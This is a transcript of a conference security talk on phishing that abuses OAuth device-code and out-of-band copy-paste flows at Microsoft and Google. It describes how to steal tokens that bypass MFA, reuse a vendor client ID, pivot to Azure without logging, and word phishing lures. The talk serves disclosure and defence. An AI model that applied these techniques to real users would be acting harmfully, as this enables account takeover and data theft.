Hey guys, how's it going? How's everyone doing, huh? Ah! Oh, come on. That's like 6 p.m. cheering. This is 4 p.m. You guys are still caffeinated. One more time! All right, this is a new speaker, man. Gotta double up. So, the next presentation is "New Phishing Attacks Exploiting OAuth Authorization Flows." Pretty academic there, huh? And the speaker's name is Jenko Hwong. And I give a big cheer. This is his first DEF CON appearance. He's so mellow. I'm gonna do this so mellow. Come on board. All right, thank you. It's good to be in Vegas. Good to see you in person. So, being a noob, take it a little bit easy on me. Just laugh in my general direction when I crack my jokes, okay? So, here we go. We're gonna talk about phishing, and the meat is about OAuth as a protocol, which I think is pretty interesting in terms of exposing opportunities for abuse. So, a little bit about me. I'm currently on the threat research team at Netskope, and I've dabbled in some of these areas over the past few years. But you really don't care about me. Let's see what I have to say. Let's see if we can get some interesting things going. So, I'm gonna give you a little bit of warning here: it tops out at about 45 minutes. But to reward you for being here in person, I added some bonus material. So there's about 60 slides to get through in 45 minutes. So if I amp it up and talk at 1.1x speed, you better listen a little bit faster, right? Wake up. If you want to fall asleep, go to track two, man. All right, this is real stuff. Thank you. All right, let's recap the history of phishing in about one minute, right? I know you guys know that, or know of people who know that. In the 90s, we're basically talking about SMTP. Attackers are faking domains, SSL certs. And the goal is the primary credential: username and password, right? Nothing new there. But then along the way, probably driven a bit by mobile, we get apps, and that changes the protocol for the phish.
So now we start getting smishes over SMS. We've got chat protocols and so on. And then from a perspective of the parties involved, it's easier for the attacker to host things. Maybe it's free accounts. With the cloud, you get infrastructure. From the user side, it's harder to detect these because the domain might be obscured, the SSL cert, you know, the real estate on a phone, those types of issues. And then with the cloud... well, let me talk about the controls. The defensive side has a couple techniques, and this is important to know, whether you're defending or red teaming. There's a lot of link analysis, which includes domains and certs. The phishes start to get a little bit more involved. Now it could be attachments that have scripting in them that follows a link. Sender reputation in terms of SMTP might be at play. And it's not only on the incoming phish; once the user clicks, you might try to detect this. There might be some packet inspection, maybe looking at the content to see if form fields with usernames or passwords are being passed. So this is what's happening. There's also controls assuming the credential is compromised. MFA turns out to be a pretty effective way to mitigate that, other than the fact that it's complicated and not everyone deploys it. Also IP lists and policies, maybe device policies, so that even if you have that credential, you can't use it unless you're on the right device or IP. So that's where we are, maybe five to ten years ago. And then what happens in 2012 is the popularity of the Internet brings OAuth, at least 2.0, as a spec. And then it takes some years to get adopted, but it's pretty prevalent now. And what does that look like? Well, there's this interchange. But basically the goal is not to have applications get your username and password. You, as the user, are going to have a secure kind of interaction with an identity provider, like Google, like Microsoft.
They're the ones who see your username and password, no one else. But at the end of authenticating and approving whatever the application wanted you to approve, the application gets a session token, an OAuth session token, which pretty much allows it to act on your behalf. And so as users, we've seen this many a time. You might be shopping, you get to checkout, you want to pay with PayPal. PayPal's an OAuth provider. You get diverted to their site, and maybe you even see the URL and the cert, and you're like, yeah, this is the real PayPal site. I feel good. Maybe your software validates that. You go ahead and maybe do two-factor authentication. It's all on the up and up. And then you get to, on the right side, finally, what we call a consent screen. In terms of PayPal, it's pretty straightforward: will you approve this transfer of funds to the original site? Well, we also see it in other contexts. So let's go to an administrator tool. All the cloud infrastructure providers, Google included, have a CLI. It also speaks OAuth. So some of you probably see that today. So I can log into gcloud as Joe Bloggs, and it'll launch a browser. It'll direct me, the user, to Google to authenticate. And I'll go through the same process. In this case, there might be cached credentials. I pick them, or I enter them from scratch. MFA, again, might be at play. And I get to a different consent screen: do you, the user, want to allow these three privileges for that application, which is the CLI? Notice a few things that are confusing, though, right? OAuth is confusing. It's confusing for the user. First, you see the blue text. That's the application name: Google Cloud SDK. What the hell is that? Didn't I just type the CLI? Well, if you're a gcloud administrator, you know that's the same thing. But if you're a first-time user, like, what is that? Application identity is really weak, or early, with OAuth.
And that opens up opportunities for phishing, because usually you can just pick that name as a developer, and that's what shows up in the dialogue. So that's a little foreshadowing, right, as we get into the presentation. But if you go ahead and authenticate and approve as a user, you get back to the application. And in the background, it's able to get the OAuth session tokens that you just approved. And then it goes on its merry way, basically accessing the cloud environment that you approved, right? Okay. Not a problem so far, if you're with me. For the most part, the payments flow works. For the most part, this works. And what happened with the phishing evolution? At first, not much. We're talking five, ten years ago. They just had a different kind of login to fake. So, hey, here's Office 365's login; I'm going to fake that. But then there's a little bit of sophistication, because we have these APIs. So when you enter your credential, some of the phishing attacks would call an API to check that credential against the real Microsoft, or Google, or whatever API. And based on the outcome, it might provide a better phish. If it's a valid credential, great: I've validated it, as an attacker. But I'm going to redirect you, maybe to the real Microsoft login in this case, maybe give you a little error message. Just say, oh, hey, thanks. It's sort of a stealthy way to make the phish appear more legitimate, right? Because the user's left not with a transient dialogue on maybe a fake domain, but with the real dialogue. But you've validated the credential up front. And if it fails, you might not store it because it's garbage, or you might prompt the user to re-enter it. Great. Same controls. We're five years back. Not a lot's changed. So let's start getting into OAuth, right? So here's sort of where things become interesting. First of all, why do we even care about jumping into the protocol itself to look for opportunities to abuse?
There are sort of two main reasons that I'll propose. One is the target is no longer the primary credential, the username and password. Why? Well, there are some problems with that. If MFA is implemented, that's not so useful. It's hard to break MFA. But if you get the session token, it's already been blessed. It's post-authentication. You can use it, and you'll never be presented with an MFA challenge. So in a way, it bypasses MFA. That's reason number one. Further, session tokens generally have this reputation of being temporary. And OAuth does have a time limit on what is called the access token. It's usually an hour, but they give you a refresh token at the same time, which allows you pretty much to indefinitely renew and refresh your access token. So for all you protocol designers out there, this is a yellow flag. When you take something that's temporary and you make it permanent, but you still call it sort of temporary, it's a bad thing. So as a researcher, or someone on the red team side, it's where you start salivating, because there's an opportunity to abuse it. So I basically have a permanent credential that has bypassed MFA. The second big reason is, almost by design, OAuth is connecting three parties that are probably distributed on different IP addresses, or could be. The identity platform is somewhere on the Internet, the user is somewhere else, and the application could be there, could be somewhere different. And so there are nice REST APIs, which basically means there are opportunities for remote exploit to grab things like tokens. It's by design made to be remotely accessible. So these are two reasons why you want to actually form your attack to exploit or abuse soft spots in the protocol, as opposed to the old way, which is just go after the username and password. So what happened with phishing? Probably a couple years ago, we first saw something called illicit consent grants, and it started to take advantage of parts of the protocol.
Instead of faking just a website, I, as the attacker, fake the application. And what is that? It is a piece of code. It could be a website, could be a local native app, but it's an OAuth application, so I do have to register it somewhere in an identity system. But basically my goal is to trick the user into granting wider privileges. They're called scopes. So basically I'm going to create something like "My Google Drive." And yes, I'm going to prompt the user to authorize maybe read/write access to everything in Google Drive. Maybe I slip in extra privileges, like read/write access to email or Google Cloud. And I want to trick the user into hitting allow. If they do, I've got them. I'll get the OAuth access tokens. I'll have bypassed MFA. I'm pretty much free to go. Okay, so that's a few years ago. And what does it look like to the user? They only see a difference in the consent dialogue. I have two different examples here. And the enumerated list might just be bigger and longer, or more descriptive in terms of wider privileges than they expect. But let's get real. No user reads this type of stuff, right? It's hard enough to get people to look at the padlock in the browser and understand what that means. I do appreciate as a researcher that the second diagram has these steps one through 12. That's actually not my doing. I appreciate it: all the fields are explained. What's the thumbnail? What's the domain? As a user, I'm horrified. It's that complicated, that you need 12 steps to explain your approval. And it just goes to show that the protocol is complicated for everyone. It's complicated for developers, complicated for users, because no one understands this. You're just going to click through it like a EULA. That's what's going to happen. So at the end of the day, this was an evolution of phishing. The controls are pretty much the same. And you're starting to see the attack side get a little more creative.
So now we come to sort of an interesting piece. Two years ago, OAuth was extended to add another flow, or set of interactions, to handle a special case, really described as: hey, we've got a limited-input device, like your smart TV. That's going to be the application. And you, the user, own the resource that I want access to: you've got your Netflix streaming subscription. But we all know using that remote control is a pain in the butt. So for usability reasons, we're going to give you a different flow, which looks like this. There's the RFC reference. Folks from Google are in there, even Ping, and Microsoft. And for you, the user, it just gives you instructions: go to your smartphone, go to your desktop where you have a real keyboard. It's really easy. Type it in. And here's a short code that you enter in addition to your username and password. Once you do that on a different device, your TV is going to magically get stuff, OAuth tokens. And it's going to connect and access Netflix, and you'll be all set up. So that's fantastic, right? It looks like that. But the problem is, I have a saying: usability breeds insecurity, or usability is the father of insecurity, right? Probably job security for some of us, too, right? But the point is, this is a flag. It's a flag for protocol designers, implementers, and researchers. So really, underneath the hood, we're going to demonstrate this, but underneath the hood, let me just describe what happens and what's different from the mainstream OAuth flow we've come to know as users. So we have that smart TV. In step two, it goes to the identity provider and gets these two codes: a user code and a device code. The user code it gives to the user, which we saw in the screenshots. The device code is used to retrieve the OAuth tokens. So the ordering is a little bit different, and there's a step up front that's different from the mainstream flow. And what's the difference? The app is totally in control of this process. The code used to retrieve the tokens doesn't pass through anything else.
It doesn't pass through the user. It comes straight from the identity provider. So without fully understanding this, this is a warning bell that there are some opportunities for abuse. So I'm going to switch to a demo. Let's see what that really means. Before doing that, I just want to do a shout-out to the doctor in this story, Dr. Nestori Syynimaa, who has a great blog, o365blog, if you care about Microsoft stuff, including OAuth and Microsoft AD. He demonstrated, about eight or ten months ago, this phish that I'm going to show you. So let's see if you guys can see that. Okay. It's not projecting here. So I may need to switch out of presentation mode. Give me a second here. Audio-visual problems. This is why they don't let new people go very often, right? Jesus. No, really, I know stuff about security. I just can't operate PowerPoint. The hell. No, seriously. Who do they let in here? All right, we're good, right? I have pre-recorded a demo of this attack. All right, you guys can see that. Left side is the victim; it's going to be a browser. Right side is a terminal session of the attacker. So on the left, let's just go through this attack. They're entering credentials. They're just logging in in the morning, doing 2FA, and into Outlook. Nothing special. Meanwhile, independently on the right side, the attacker is going to phish this person, Ed at Feast Health on the left side. I want to point out that the attacker has not created anything. No fake domain, no fake application, nothing. He's going to run a script. First thing the script is going to do is use a REST API call to Azure, to Microsoft, and grab a user and device code. It's in the output. This is a real call, just dumping the output. It's going to use the user code to phish the user. And there's also a login URI that's in there. That is standard, doesn't change. It's a real Microsoft login for device code. Okay?
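To make that first step concrete, here's a minimal sketch of what such a script might send. This is not the speaker's actual script: the endpoint shape follows Azure AD's v1 device-code flow as publicly documented, and the client ID shown is the widely cited public ID associated with Microsoft Office; treat both as assumptions of this sketch.

```python
# Sketch: request a user code and device code from Azure AD's
# device-authorization endpoint. No app is created; an existing
# first-party client ID is reused, so Microsoft's own app name
# shows up later in the login flow.
from urllib.parse import urlencode

TENANT = "common"
DEVICE_CODE_ENDPOINT = f"https://login.microsoftonline.com/{TENANT}/oauth2/devicecode"
# Widely documented public client ID attributed to Microsoft Office
# (an assumption of this sketch, not taken from the talk).
OFFICE_CLIENT_ID = "d3590ed6-52b3-4102-aeff-aad2292ab01c"

def build_device_code_request(client_id: str, resource: str):
    """Return the endpoint and URL-encoded form body for the request."""
    body = urlencode({"client_id": client_id, "resource": resource})
    return DEVICE_CODE_ENDPOINT, body

endpoint, body = build_device_code_request(OFFICE_CLIENT_ID,
                                           "https://graph.microsoft.com")
# The JSON response carries user_code (sent to the victim in the phish),
# device_code (kept by the attacker), and a verification URL that is a
# real, unchanging Microsoft login page.
```

POSTing that body to the endpoint is the "real call, just dumping the output" step described above.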
So this demo script just sends out a phish email with a template, which we'll see pop into the browser on the left side. All right? Ed at Feast Health is going to get this Outlook email. I just want to pause here for about four seconds, okay? I worked hard at this template, okay? I'm not the greatest phisher. That's not my job. Maybe you know someone who's better, but look. All right, this is a product-team email. Okay? Hey. I can also not operate a video. My skills are bad. Okay, let's go back. Come on. Come on. Pause. Pause. Okay. Spacebar works. Look, this is a freebie, right? Who doesn't want a freebie? One terabyte of extra space, a 100-megabyte attachment size increase, just for you, right? This is carnival-barker stuff. It's a free discount right here. All you have to do is go to the real Microsoft login, enter this nice short code, and we'll automatically give you that in your account. You will love us. So what's happening? They enter the code, all right? Let's assume they follow the phish. Let's just be aware of what the user sees on the left: pick an account or enter your credential. We already logged into Outlook in the browser, so it's got a cache, but it could be any account. Then it says, are you trying to sign into Microsoft Office? Where did that come from? It's because I didn't explain what the attacker did. The attacker did not even create an app. It just reused an existing app ID. It's called a client ID. It reused Outlook's client ID. That's nice. So what shows up came from Microsoft's real app: their name. And what's going to show up in Microsoft's logs? Microsoft Office. Then we're done, pretty much. That's all the user sees. Not much different, other than the code. So what's happening on the attacker side? They sent the phish and they moved to step two, which is querying, polling, looping, just querying Azure and saying, hey, let me know when the user logs in. After they do, give me those OAuth tokens.
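That polling step can be sketched roughly like this. Again a hedged sketch, not the demo script itself: the token endpoint and `authorization_pending` error follow the standard device-code grant; interval and attempt counts are illustrative.

```python
# Sketch: after phishing out the user code, repeatedly POST the device
# code to the token endpoint until the victim authenticates, then
# collect the access and refresh tokens.
import json
import time
import urllib.error
import urllib.request
from urllib.parse import urlencode

TOKEN_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/token"

def build_poll_request(client_id: str, device_code: str) -> bytes:
    """URL-encoded form body for one polling attempt."""
    return urlencode({
        "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
        "client_id": client_id,
        "code": device_code,
    }).encode()

def poll_for_tokens(client_id, device_code, interval=5, attempts=180):
    """Loop until the IdP returns tokens or the codes expire (~15 min)."""
    body = build_poll_request(client_id, device_code)
    for _ in range(attempts):
        try:
            with urllib.request.urlopen(TOKEN_ENDPOINT, body) as resp:
                # Success: contains access_token, refresh_token, scope...
                return json.load(resp)
        except urllib.error.HTTPError as err:
            # "authorization_pending" just means the user hasn't
            # logged in yet; anything else is a real failure.
            if b"authorization_pending" not in err.read():
                raise
        time.sleep(interval)
    return None  # codes expired before the victim bit
```

The loop does nothing but wait; all the hard work was done by the victim at Microsoft's real login page.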
So I just logged in, and boom, all this long gibberish, if you can see it, is the OAuth tokens. First thing you see up top is the scope, the permissions. Where did that come from? Well, it turns out that's optional. When I executed this as an attacker, I didn't even request permissions. In Microsoft's version, they give me the default, and that's a crapload. It's a very technical term. A load of permissions: calendar, email, contacts, read, write. It's all there. You can see the access token in there. Once you have the access token and refresh token, you've got the keys to the kingdom. The resource I did specify as an attacker is the Graph API in Microsoft, which gives me a fair amount of access. Definitely to Office, but more. And I'm going to, as an attacker, just prove that the access token is valid. First, I'm going to log in on the left into Ed's Azure account. All right? And on the right, I had already used the access token. I see three users: David, Ed, and Sandra. On the left, I'll check in Azure AD as Ed. And of course, this was live. It's real data. The users are those three that I created in this environment. It doesn't stop there. I can access Ed's email. So three messages show up. The title of one is actually the phish that Ed received. And of course, if I pop back to Outlook on the left, it matches exactly, down to the date, right? It's all real data. So, so far, from this phish, I've gotten AD users, I've gotten Outlook, but there's more, right? So one of the things I can do, and this is really subtle, this is the pivot: the door's wide open to switch from the Graph API to almost any other resource. I'm going after Azure right now just because I know Azure will exist, because that has AD in it. So the resource changed. I did a refresh token call and I said, give me another token, a different token, for Azure management APIs. And Microsoft didn't put up a fight. It just gave it to me. All right?
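That refresh-token pivot boils down to one more POST. A hedged sketch under the same assumptions as before (v1 Azure AD token endpoint; all values are placeholders):

```python
# Sketch of the pivot: replay the stolen refresh token against the
# token endpoint, but name a *different* resource -- Azure management
# APIs instead of the Graph API.
from urllib.parse import urlencode

def build_pivot_request(client_id: str, refresh_token: str,
                        new_resource: str) -> bytes:
    """Form body asking the IdP to mint a token for a new resource."""
    return urlencode({
        "grant_type": "refresh_token",
        "client_id": client_id,
        "refresh_token": refresh_token,
        "resource": new_resource,  # e.g. Azure Resource Manager
    }).encode()

body = build_pivot_request("<client-id>", "<stolen-refresh-token>",
                           "https://management.azure.com/")
# POSTing this to login.microsoftonline.com/common/oauth2/token returns
# a fresh access token scoped to Azure management -- and, per the talk,
# this exchange is not logged the way the initial grant is.
```

Nothing in the exchange asks the user anything; the refresh token alone carries the day.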
And with that, I can do things like enumerate with Ed's permissions. It turns out Ed in this case is a global admin in Azure, so I hit the gold mine. I can do everything, right? I've got a new access token. I've got the keys to a new kingdom, and I'm going to use that right off, and you'll see; we'll let this play out. I've just enumerated every resource Ed has access to in his subscription in Azure. And just to prove it to ourselves, I'll go back to Ed's view on the left, and there's a subscription named Azure Subscription One, which is exactly what I pulled with the attacker script. If I go to all resources in that subscription, I'll pull up maybe a dozen or so, and I've got things like disks and computes and SSH keys and storage accounts with data. There's one storage account named SAJEH1SA; on that is a container, and on that are some files. But basically, no surprise: once I've gotten a certain amount of scope and privilege with a token, I can do anything with it. Now, what I didn't pause at, and I'll just explain as we're looking at the data and it's syncing up, is that I got a new scope as I pivoted to Azure. I requested a scope, and it was a really low-level scope: user profile information. What I got back was user impersonation, which in Microsoft's world means I can do everything the user can do within Azure. And it's pretty common, but you can just see how the door opened. Step back from it. This was a Microsoft Office phish with a free-space offer. I did successfully phish and get access to Outlook and some AD information. Then I pivoted, and then I went to Azure, and I've got everything the user can see, and in this case I got the right user. So all told, not only was I able to be stealthy, I had huge, huge access with this pivot. So let's go back to our slide deck. So what do you think? Yeah. Well, thanks for that. I didn't really expect applause. I just wanted to touch base.
I just wanted to see how many people in the crowd worked at Microsoft and see what response I would get. And I know what you're thinking: did someone really get paid to implement that version of OAuth? Yeah, apparently so. But I don't particularly blame Microsoft, even though this is a pretty big exposure. OAuth is complicated, and you'll see as we go, you can't keep the stuff straight. I've been looking at it for months and it's complicated, and it's complicated for users and developers. So let's just peek under the hood a little bit and appreciate that complexity. This is the handshake, 1 through 6 or 7, of what happens with that device code flow. Ultimately, step 5 is authentication, right? And then the real magic happens in step 6, when they get the OAuth token. But the key to all of this working is step 2. The device or application has full control of generating these codes. It has the user use one of the codes to authenticate, and then with the other code, it grabs the tokens. It's pretty easy, right? If you want to authenticate this way, there's no login flow to set up for Netflix. The app, the malicious app or device, runs the show. And I didn't even need a Microsoft account as an attacker, by the way. This is about as stealthy as it gets, and the pivot happens right after. This is where I just switch from Outlook to Azure, right? Some of this is common to other providers, and some is specific to Microsoft. Attacker: no server infrastructure, no website, no fake page. The login page is Microsoft's. No fake app of any kind. I have a dumb little script that just polls and grabs tokens on my time. No consent screen to the user. It did say, hey, you're logging into Office, but there was no "do you want to give these privileges away to the app?" No, there was none of that. And worse, there was this default scope in play, where I got a lot by default. So about logging: there is an event logged when the attacker grabs this OAuth token. It shows an IP address.
So the attacker will just have to obscure the IP address. You know what's not logged? The pivot. When I use the refresh token to go to Azure, it's not logged. And you can imagine that there's a bias: people who implement OAuth think, well, the refresh token, I mean, pretty much it's indefinite. You just have to do it every hour. Why would we log that and take up space? Because you're getting proverbially screwed, that's why. You want as much information as possible, but that's not logged. And that's really what I mean by a pivot. I could have directly gotten Azure access tokens from the get-go. I could even have done that as Microsoft Outlook. That's a little weird. I could have reused the Azure CLI and gotten direct access in step one, but then that would have been logged. If I'm really going after Azure, I should do it in step two, because it won't get logged. And at the end of the day, this just makes it tough for the defenders. There are some controls that are probably in place. People may try to block these device URLs. They are unique if you look at the full path. The domain is not unique; they're very commonly used. But that's imperfect, because you know what? There are real apps that use device code authentication. I mean, you might block smart TVs, but the Azure CLI can log in using device code. It can log in with a browser, but it also supports device code. Detection is difficult because of limited logging, and remediation is imperfect. On the good side, with Microsoft, you can revoke the refresh token for a user. So if you're remediating an incident, and you're on the defensive side, you can do that, but it only takes out the refresh token. The access token? This is in the documentation; it says something like, well, we don't do the access token, but it'll expire within the hour. Good luck. The heck. Other than all these issues, it's a pretty good, secure system. It just shows that controls are lagging. It's a complex protocol.
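For defenders, the revocation step mentioned above can be done through Microsoft Graph (it's also available via the Azure AD PowerShell cmdlets). A hedged sketch; the user identifier is a placeholder, and the caveat in the comment is the one from the talk:

```python
# Defensive sketch: revoke a compromised user's refresh tokens via
# Microsoft Graph's revokeSignInSessions action. Note the limitation
# discussed above: already-issued access tokens keep working until
# they expire, up to roughly an hour.
GRAPH_BASE = "https://graph.microsoft.com/v1.0"

def build_revoke_request(user_id: str):
    """Return (method, url) for the Graph revokeSignInSessions call."""
    return "POST", f"{GRAPH_BASE}/users/{user_id}/revokeSignInSessions"

method, url = build_revoke_request("ed@example.com")  # placeholder user
```

The call needs an admin-consented Graph token of its own; it invalidates refresh tokens only, which is exactly the "good luck" gap the talk points out.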
Now, there's a practical consideration from the attack side. These user and device codes, once you generate them, last for 15 minutes. So again, security by temporary expiration, in a way. You can just play the numbers game as an attacker: send out a million, people will still get it in their email inbox, and some will respond. You could go to SMS or chat, smish them. Much more interactive; people will probably respond better. You could also fall back and create some infrastructure. Instead of phishing with the device code, meaning I pre-generated it and started the clock ticking, it's "come get your free discount code." You come, press a button, and the clock starts ticking. It's like search ads: once you're searching, you're ready to do something. So now you're ready to get that discount code. There are trade-offs, but it certainly shows that practical considerations shouldn't be a barrier. I could even do an image version of the code, because email clients in general will not load images by default, but users often load them. That request could come to my website as an attacker; I could generate the code then, show it to you, maybe get a better response. Okay. Let's talk about Google. They're big in OAuth, plenty of apps. How's their device code authorization? Well, a lot of similar characteristics. I can spoof or impersonate a Google app. I don't have to build an app; I can use the Google Cloud SDK. Where Google is different, and it saves them, is they limit things: they require you to supply a scope. They ask; you have to tell them what you're trying to get. Whereas Microsoft will just give you a lot by default. And it's limited: there are like seven scopes. Three have to do with user information, like your email address. Two are for Google Drive, but only data created by that app. And then two are for YouTube. So it's a pretty tight set of permissions you can ask for. But you can get back, in this case, the device and user code.
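The same probe against Google can be sketched as follows. Hedged: the endpoint and the requirement that `scope` be present follow Google's published limited-input-device flow; the client ID and scope strings here are illustrative.

```python
# Sketch: Google's device-code request, where (unlike Microsoft's
# default-scope behavior) a scope parameter is mandatory and drawn
# from a small fixed set (profile/email, limited Drive, YouTube).
from urllib.parse import urlencode

GOOGLE_DEVICE_ENDPOINT = "https://oauth2.googleapis.com/device/code"

def build_google_device_request(client_id: str, scope: str) -> bytes:
    """URL-encoded form body; omitting scope is rejected by Google."""
    return urlencode({"client_id": client_id, "scope": scope}).encode()

body = build_google_device_request("<client-id>", "email profile")
# The response carries device_code, user_code, and a verification URL
# pointing at Google's real device-login page.
```

The mandatory, tightly limited scope is exactly the "it saves them" difference the talk highlights.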
I can phish a user, convince them to go enter the code. They'll go through authentication and end up finishing that flow. And what's similar is: no consent. So I know what you're thinking now. It's pretty similar. And it might be hard to believe that Google would give up basic user information (name, email address, your picture) without user consent. I mean, that doesn't happen, like, in the last 10 years. But it did happen. It's footnoted. In some cases, if you ask for other scopes, sensitive scopes, you'll get a consent screen. But you can see that this warning, this consent-screen dialogue for the user, is very implementation-dependent. And they both share this characteristic: both vendors do not present it with device code authorization. So anyway, the flow keeps going. This is just a set of curl commands so you can actually see what's happening down low. I can actually grab and get the access token. I can use it. And in this case, I can get user information back. Okay? So in summary, this is the red and green. Those are the main differences. Look: no consent screens, in both, for most of these flows that I'm showing. The big difference is Microsoft opens the door and gives you a lot of privileges; Google constrains you to those seven scopes. The lateral movement is a huge difference. You can pivot in Microsoft from one set of APIs to another, no questions asked. With Google, so far, that's extremely hard to do. That's just one flow. OAuth has like five. So let's go back to the main flow that we all know and love: authorization code grant. Let me just show it's not as obvious as the device code impact, but it still shows the weaknesses in the protocol. So let's just show something that my kids would say is janky, dad. This is really janky, if they understood this at all. So let's go back to the main flow. You don't have to understand all of it, but I want to point out something.
When the app redirects the user to go authenticate and they finish, this authorization code has to get back to the app from the identity provider. And this is complicated, because it's done through a redirect URI, and there are many cases. So if the app is public, sitting on a public domain, you'll pass that URI to the identity provider, Google or Microsoft, and they will directly communicate the authorization code to you, because it's a public app sitting on the internet. However, the app could be behind a firewall, sitting on the user's machine, behind NAT. So the redirect URI can also reference a host that's like localhost or the loopback address. And how does that get to the app? It goes back through the browser as a 302 redirect. This is where it gets janky, because you're like, what the heck? There are multiple protocols at play. One's a sort of proper 302 redirect, or maybe some kind of webhook communication. Another one's a redirect through the user's browser. But that could also be a mobile app, and then it goes through those funny URLs where you have a registered mobile app. Basically, what this screams is there are opportunities for abuse, because if you can intercept that, it gives you the keys to the kingdom. You could attack the browser, as an example. Could be an extension, could be cross-site scripting, and you might be able to get that authorization code. You can attack the registration on the device. You can attack the localhost name lookup. These require endpoint access, sure, but clearly that's not prohibitive in this day and age. But that's not actually what I want to talk about. Highlighted in red is yet another form of a redirect URI: OOB, which stands for out-of-band. It's a copy-paste thing. What the heck does that mean? It means as an app developer, I can request that the authorization code come back to me through the user: show them the code in their browser, and prompt them to copy and paste it into my prompt.
Who the hell would do that? A CLI would do that. Why? With a CLI, you could be SSHing into a remote environment with no browser, no graphics, and the only way it can get an authorization code is for you to copy and paste it. And that's exactly what the Google CLI does. And who cares about this? Well, it's an opening, a little opening, to abuse, because I can intercept that: the user is sitting there with a code in front of them, and I can convince them to copy and paste it. So maybe I fall back, create a website, and drive them there with a phish. And this is a website to invite you, all of you important customers, to our innovation group. It will be at DEF CON. You'll be able to talk to us, affect our product strategy. All you've got to do is log in to prove you're a Google customer, and you're going to get a code; just copy it into our website. Yeah, I have to convince you, and I have to get by the domain issues of hosting this. But if I do that, and you go through and log in, you see the very official authorization code, and guess what? No one on earth understands what that code means anyway. Does anyone understand what that code is? No. And look at the message. It says: copy and paste it. Good luck. You don't know that it's tied to your session tokens, which are the keys to the kingdom. So if I can con the user into copying and pasting it into something I control, I win. I get the session tokens. So what's the point of this? This is not as sexy as the device code exploit. But it does show that a vendor, Google, chose to implement copy-paste; Microsoft did not. It exposes them. And I would not bet against this being exploited. I just would not. What does the Azure CLI do? They use device code flow. Google does not; they use this copy-and-paste. That's how they do their CLI, in part. So I can of course take that token and go, and since I requested full access to the cloud environment, I can literally enumerate everything there.
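The redemption of that copy-pasted code can be sketched like this. Hedged again: the out-of-band redirect URI (`urn:ietf:wg:oauth:2.0:oob`) and Google token endpoint are as publicly documented; the client credentials are placeholders (for installed apps like gcloud, the client ID and "secret" ship in the binary and are effectively public).

```python
# Sketch of the out-of-band exchange: the victim pastes the
# authorization code into a page the attacker controls, and the
# attacker redeems it at the token endpoint using the special
# copy/paste redirect URI.
from urllib.parse import urlencode

OOB_REDIRECT_URI = "urn:ietf:wg:oauth:2.0:oob"
TOKEN_ENDPOINT = "https://oauth2.googleapis.com/token"

def build_oob_exchange(client_id: str, client_secret: str,
                       pasted_code: str) -> bytes:
    """Form body that trades the pasted code for tokens."""
    return urlencode({
        "grant_type": "authorization_code",
        "client_id": client_id,
        "client_secret": client_secret,
        "redirect_uri": OOB_REDIRECT_URI,
        "code": pasted_code,  # the string the victim copy/pasted
    }).encode()

body = build_oob_exchange("<client-id>", "<client-secret>",
                          "<pasted-code>")
# A successful POST returns access and refresh tokens for whatever
# scopes the original authorization URL asked for.
```

Nothing ties the paste target to the legitimate CLI, which is the whole soft spot.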
Okay. So how are we doing on time? Oh, good. You guys have done a good job of listening fast, or at least pretending to. So we have a couple more slides. I wanted to pause here. It's all well and good to see examples, but I thought it might be more useful to think about how we should research things like OAuth and protocols, and maybe look ahead, definitely from a red team perspective, and maybe a blue team one too. When we're analyzing protocols, we're at a much higher level, and there are certain places you want to look for soft spots. One is the handshake in the protocol, and I think there are two major cases to be aware of. One is the sniffing type of attack, where you're intercepting traffic, man in the middle, so yes, the attacker can get secrets and other things. But the problem is, I think there's a heavy bias, and I say that from reading the protocol specs, a heavy bias toward assuming all attacks come through that method. What about outright impersonation? What if I take the place of one of the three parties: the application, the user, or the identity platform? The user is the victim, but I can take the place of the application wholesale. Then I get all the traffic, and I create some of the traffic. It's harder to pull off, of course, but it's well worth it. And the problem is that people aren't thinking about that; the controls and defensive measures don't protect well against it. Obviously we're after secrets. We're after the tokens. But with OAuth, it's not just the tokens: the tokens presume you have the authorization code or the device code, and that's really what you're after. So you have to understand the protocol to know what really gives you the real secret. And at the end of the day, not everything is in the spec. Things are optional. Things are left to the implementer, as we've seen from the differences. So just testing whether the vendor implements the spec reveals a whole bunch of cases where, no, they didn't.
Or sometimes they added proprietary things. Microsoft added this proprietary scope thing, and what the heck is that? Well, that caused some trouble. Google and the browser: when you log into Gmail, you can open up a new tab, type in a generic drive.google.com, and guess what? You're popped into your Google Drive. But you didn't have to reauthenticate, or approve Chrome getting access to Google Drive. They did stuff underneath to make your experience easier. And anytime someone goes off the rails like that, it usually leads to errors, or opportunities. Anytime you see optional or deprecated, and there are plenty of those in the spec, that's a big warning sign. Because one, things are usually deprecated because they're insecure, and it usually takes years to actually remove them, so you get this big window. And there are a bunch of concerns highlighted in the RFCs themselves, and those are great places to start. Remote phishing, as an example, is mentioned in the base RFC. And the mitigations it describes are biased, because the language says something like this: to protect against remote phishing of device code flows, the identity provider platform, Google or Azure, should tell the user in big bold letters, remind them, that a device is getting access to whatever you see you're being prompted for. But that already assumes there's a valid device in the picture. If I'm controlling the device, if I'm the phisher, I can convince you that's exactly what you should see. Of course you're going to see device language. And half the language is wrong and confusing anyway: you see "Google's cloud SDK" when it should say something like "a CLI". I can convince you of anything. No one even reads today; really, we're at about a third-grade reading level in the States. This is not going to work, right? But that's what's in the spec, and it just shows how bad an assumption that is in terms of protecting some of these protocols.
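The remote device-code phish that the RFC language fails to stop can be sketched in a few lines. Here the device-authorization response is a hard-coded stand-in for what a provider's endpoint would return (the IdP domain, code, and lure text are all made up for illustration); the point is that the attacker, not a legitimate device, originates the flow, then simply relays the provider's own user code to the victim.

```python
# Stand-in for a real device-authorization response; in a live attack the
# phisher would POST to the provider's device endpoint and receive these values.
device_auth_response = {
    "verification_uri": "https://example-idp.test/device",  # placeholder IdP
    "user_code": "BXRQ-JZLN",
    "expires_in": 900,  # seconds the code stays valid
}

# The phish relays the provider's own UI back at the victim, so the
# "a device is requesting access" warning reads as expected, not suspicious.
lure = (
    "IT Helpdesk: your account migration completes today.\n"
    f"Visit {device_auth_response['verification_uri']} and enter code "
    f"{device_auth_response['user_code']} within "
    f"{device_auth_response['expires_in'] // 60} minutes to keep access."
)
print(lure)
```

Because the victim types the code into the genuine identity provider's page, link analysis and cert checks on the phishing side have nothing to flag.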
